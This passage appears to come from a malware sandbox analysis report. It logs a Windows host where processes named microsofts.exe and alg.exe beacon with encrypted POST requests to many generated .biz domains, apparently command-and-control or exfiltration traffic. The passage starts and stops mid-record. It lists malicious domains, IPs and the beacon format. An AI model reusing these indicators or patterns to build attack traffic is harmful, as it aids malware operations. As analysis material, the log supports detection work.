-->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET345OUTPOST /sy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET778OUTData Raw: 12 6b c6 30 72 60 e6 12 fe 02 00 00 a6 bf fc 3d d2 ae 57 37 1a ef bb 4c e6 7b b2 49 42 74 9a a6 21 29 75 48 5c 9b c2 ca a6 df 8e 76 fd 31 39 26 67 19 18 2b 27 e8 c2 78 ad 92 25 12 2d 57 ad 59 61 ca 5d 09 fb 4e 74 10 8b b3 18 51 7a 37 a8 23 e2 bf
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k0r`=W7L{IBt!)uH\v19&g+'x%-WYa]NtQz7#zdm8`=Q^mRo_WK EKi0EgK*0kf:d2l+}1Arspz+2QlCzl5789CN>F~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.631006002 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
46  192.168.2.5  59631  172.234.222.143  80  1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:39.447076082 CET  342  OUT  POST /t HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:39.447289944 CET  828  OUT  Data Raw: 60 d3 31 23 9f e6 cf 07 30 03 00 00 d5 cc 25 e2 de 80 5a db c9 ed b4 46 0f b7 e2 0f ed aa 35 92 81 6a 95 37 06 aa db c9 e4 b7 86 65 e5 a1 57 46 81 ec 73 7a 96 d0 8c 3f 93 6c 5f 47 34 1f 73 cc 91 4a 4c d0 0f b0 ee 8b 43 19 f1 eb 98 96 ec 46 f6 6b
Data Ascii: `1#0%ZF5j7eWFsz?l_G4sJLCFkA@oW<a 6:S>NyJ%gIR@ W$(_|]ju?F>CFVxx<C*QUZ.$+iB$m%H.}u_N>hn^(


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
47  192.168.2.5  59632  34.211.97.45  80  1492  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:40.038399935 CET  342  OUT  POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:40.038399935 CET  778  OUT  Data Raw: a0 8f 6e 77 5f d0 6e 72 fe 02 00 00 3e e6 de 90 fc 3f dc 2e d1 78 b1 54 9f 5a 5e ed ed 9e 83 39 97 77 f1 20 f5 e4 07 8d a5 4c 1c 49 e7 be e6 bd 7c d4 8c 1c 5a bb 6c c6 ac 8f da 49 78 c6 c9 3c ef 73 79 04 68 42 81 41 57 1a 8a 94 99 4e 95 c9 57 53
Data Ascii: nw_nr>?.xTZ^9w LI|ZlIx<syhBAWNWS>+CWPgQk}Baa/8Td{fLM:b}tpXB!6e=bf;s_s#mo}&6%/ZfKoFx~
Nov 5, 2024 17:03:40.873228073 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6a952ab4a0f140fdbcc406bc2ccaec08|173.254.250.76|1730822620|1730822620|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 59637 | 34.246.200.160 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:40.337990999 CET | 353 | OUT | POST /faellchgtux HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tbjrpv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:40.338012934 CET | 828 | OUT | Data Raw: 4a 7e fc 61 06 46 ea 04 30 03 00 00 bd 3c 5e 44 df 85 05 d3 f4 e5 9b 1d e7 ad dc 3e a0 e1 53 c0 e9 45 aa d8 7f 1f 97 51 66 d0 ce 36 46 96 de 7b 38 99 81 61 1c a7 98 36 cc e0 67 eb c7 14 90 2c 0c 5a d4 87 69 9a 0e 6d 8b b9 ee e8 19 49 10 3b 94 e1
    Data Ascii: J~aF0<^D>SEQf6F{8a6g,ZimI;0~5Uz3GAEM?DEs$Xz0T`BS;t/=#g8UD.]IQF0J<Y`Z()*mk1^3%#7*6&9?tK]Ptm35a;
Nov 5, 2024 17:03:41.342601061 CET | 414 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:41 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=eeb75199d6c98e0071fc06099ed67d09|173.254.250.76|1730822621|1730822621|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 59643 | 54.244.188.177 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:41.190515995 CET | 360 | OUT | POST /eboqedbjpoqnvpqk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lrxdmhrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:41.190584898 CET | 778 | OUT | Data Raw: 2e 8b 9a 68 c1 5f b9 7d fe 02 00 00 64 e8 9a 86 65 ad a4 a3 9a f0 85 5d d8 51 82 44 aa 38 c8 66 08 65 b4 36 da e3 70 d4 d4 7f c1 a0 91 ed 32 9c 47 17 94 b5 a6 48 6f ae d1 99 22 89 c8 fb a8 57 f7 46 c9 58 ba 8a 2c 70 25 aa d2 b9 2a ac 6c 81 d6 55
    Data Ascii: .h_}de]QD8fe6p2GHo"WFX,p%*lU7P$?)gzl,c=$1~61Ad:Q28$]@GBv=2(f}j2]@hG1e5a2o2PR{T>zdKPIklL!) &omKP
Nov 5, 2024 17:03:42.028856993 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:41 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=1ad230217069323dabbd860404cd2878|173.254.250.76|1730822621|1730822621|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 59646 | 18.208.156.248 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:41.471607924 CET | 352 | OUT | POST /dxiykgktglw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: deoci.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:41.471630096 CET | 828 | OUT | Data Raw: ca b0 9b f9 b2 7e e2 4b 30 03 00 00 82 1d dd f7 98 57 82 13 e7 a8 a1 77 1c d3 d1 cb 72 e0 89 34 ab 75 33 1f 73 c5 1a f4 94 bf 43 3e fe 5e 29 11 1b e3 7a 05 df 45 b6 42 c1 98 78 26 69 01 59 4a 54 f2 74 3f 41 ba eb e9 b1 4e cc 46 11 dd 06 6d 8d 5a
    Data Ascii: ~K0Wwr4u3sC>^)zEBx&iYJTt?ANFmZM`9U:>E7zjW]H%B6S-]CaLV3Lfn0FOZT#1\NoP~+PWo4I%p'ZawcHgyU
Nov 5, 2024 17:03:42.134263039 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8825c8a88cb8890f6d921abd08a40a3e|173.254.250.76|1730822622|1730822622|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 59652 | 208.100.26.245 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:42.189733982 CET | 347 | OUT | POST /jwx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gytujflc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:42.189766884 CET | 828 | OUT | Data Raw: d2 08 e6 3a 21 b4 58 c5 30 03 00 00 c8 72 20 cd df 20 fb 0c b2 0b 21 49 45 ab 51 92 31 d4 d3 b5 b0 6b 3d 51 5d 47 10 c2 93 6f 8c a0 46 d4 f6 a3 f8 76 3a 20 e4 ed ae 70 e5 73 35 2b ce 32 54 8c e9 6d 39 93 6a 89 f2 3e 6a da de 7e 25 c5 e2 c9 c3 a8
    Data Ascii: :!X0r !IEQ1k=Q]GoFv: ps5+2Tm9j>j~%&bA>agV)TOzvp{$aPni5<'7HhH6J^i*@Y,FI2rWgvhm5V!3>r\S#ViS(aV6[/
Nov 5, 2024 17:03:42.824763060 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:03:42 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 5, 2024 17:03:42.864799023 CET | 357 | OUT | POST /ymfaswtstxnaa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gytujflc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:42.864799023 CET | 828 | OUT | Data Raw: 6c 0e 55 6e 09 76 a6 1c 30 03 00 00 5b f0 40 be b6 f2 f2 51 b8 a9 cf 17 ff eb 27 10 da c5 30 4f 86 32 f6 84 14 c4 4e 29 38 3d a3 f5 fc c8 5c ef 74 33 54 20 50 81 86 02 da 19 f7 e8 e6 0d 29 47 9b a4 e2 31 98 45 cf 2e 55 86 f3 cb 26 69 46 6d 21 21
    Data Ascii: lUnv0[@Q'0O2N)8=\t3T P)G1E.U&iFm!!If{]i!UkMQkxij7j^SKG[|cccJ-.p2t nP<`Bcv=D8=j#+ gNuW&dmO`J7
Nov 5, 2024 17:03:43.011395931 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:03:42 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 59653 | 18.141.10.107 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:42.538019896 CET | 347 | OUT | POST /glpq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: wllvnzb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:42.538038969 CET | 778 | OUT | Data Raw: e6 80 73 8c da d2 31 70 fe 02 00 00 48 ff ec a0 52 84 a6 04 82 c2 81 b0 35 3b 1e 1f 65 b0 ef 07 c2 de da 81 8b 48 63 c6 8b 12 25 ed ad 99 ea 1c 96 2c 11 d5 5f 33 6a 08 81 04 76 b2 79 99 b3 72 4a 6d 17 16 4b f1 31 50 75 dc 60 72 a0 bd 7a ec e6 97
    Data Ascii: s1pHR5;eHc%,_3jvyrJmK1Pu`rzLaLx0NZUy8! nI(GxhC[0D<7(;Bi{DSmXCvL*}SQ,5:4y& f1b`DrG!3XsE+4
Nov 5, 2024 17:03:43.979379892 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:43 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e14a9defdaa587cefd8dfb7ba931a182|173.254.250.76|1730822623|1730822623|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 59660 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:43.076834917 CET | 353 | OUT | POST /vmxdnohruim HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: qaynky.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:43.076880932 CET | 828 | OUT | Data Raw: ea 0f 72 fe ac 5d 0e e0 30 03 00 00 36 2a 68 45 73 d7 5e ce 9b 80 5b d3 96 6d b2 ff b8 06 9c 85 68 05 92 6c cf bf 03 89 4a 75 a6 b3 2d 59 36 d5 fe 99 8b 46 2f 1b 33 57 31 b0 1e 35 80 40 2a 5e 67 99 5d 15 20 aa b4 d2 67 13 28 8a cf 3e 2a ed f1 18
    Data Ascii: r]06*hEs^[mhlJu-Y6F/3W15@*^g] g(>*ju\p@AU`{E?Ln*PuQk8ViTW<hqh6w2^`J]bm#4wqUh.?Ac.8~UNc<Tr9'_
Nov 5, 2024 17:03:44.502327919 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=82660fe137c9f28fcc3e6de66902a0a1|173.254.250.76|1730822624|1730822624|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 59666 | 18.208.156.248 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:44.212300062 CET | 355 | OUT | POST /qwtkmqbsexpiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:44.212440968 CET | 778 | OUT | Data Raw: b7 38 e9 e5 b9 16 e2 82 fe 02 00 00 47 69 87 5e 64 ef 1b 16 0b d1 21 ba 50 9b b7 7d a9 4b 67 26 00 5c 78 5c 04 c6 97 29 f2 e4 14 04 f4 50 27 db fd e2 8d 78 90 a1 1b 10 82 48 27 81 14 9f f6 eb c7 02 98 b2 d5 2c a0 c8 ff c3 6c f5 18 81 02 2c 66 39
Data Ascii: 8Gi^d!P}Kg&\x\)P'xH',l,f98> u18KL\Q)LII25TQ"TtL6*r4M^HUs{-%[Bqj])T:=Gdz`-YIs}|Asnz&K:WS+L
Nov 5, 2024 17:03:44.869647980 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7860de31d48116106184b6d344aa6a63|173.254.250.76|1730822624|1730822624|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 59667 | 44.221.84.105 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:44.553659916 CET | 357 | OUT | POST /nnsrvdrwdsdf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:44.553705931 CET | 828 | OUT | Data Raw: c2 6f fa 53 4e 7c 04 e0 30 03 00 00 03 21 42 6a e8 ec 90 49 e4 3c d8 64 ab e1 99 b0 e6 c7 f6 5b a0 7e 78 47 31 98 b5 39 d3 fc a0 77 ed 73 97 69 d6 ff 40 c4 3e 73 20 ac 42 8f ef ed d9 3c a2 83 dc ac d9 77 e2 6b b5 df c8 be c7 2d 72 ec ca 61 0f d6
Data Ascii: oSN|0!BjI<d[~xG19wsi@>s B<wk-razt06+^ii{U/&WUz;X*s:o//-ALq><pAxWbTA>oU Q,)CRWGumqKH>7?Wo=1|
Nov 5, 2024 17:03:45.208004951 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a1f27b73967c20a875cc0b3a03cc1a84|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 59673 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:45.112466097 CET | 359 | OUT | POST /alkfibvhvyencmw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
